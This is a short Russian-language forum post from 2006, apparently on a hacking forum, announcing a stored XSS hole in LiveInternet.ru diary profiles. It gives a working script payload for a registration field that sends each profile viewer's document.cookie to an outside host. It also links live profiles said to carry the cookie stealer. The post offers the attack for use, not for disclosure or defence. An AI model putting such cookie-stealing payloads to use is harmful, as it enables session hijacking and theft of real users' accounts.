13.12.2006, 12:10
|
|
Участник форума
Регистрация: 05.09.2006
Сообщений: 187
Провел на форуме:
6860213
Репутация:
378
|
|
XSS в дневнике LiveInternet.ru
Вот нашол активную xss:
когда регимся, вводим в поле "О новом дневнике - в двух словах"
Код:
<script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>
.
потом все кто помотрит ваш профиль отдаст куки...
Примеры:
http://www.liveinternet.ru/users/hello2all/profile/ - тут отдадите куки
http://www.liveinternet.ru/users/nokia1/profile/ - алерт. |
|
|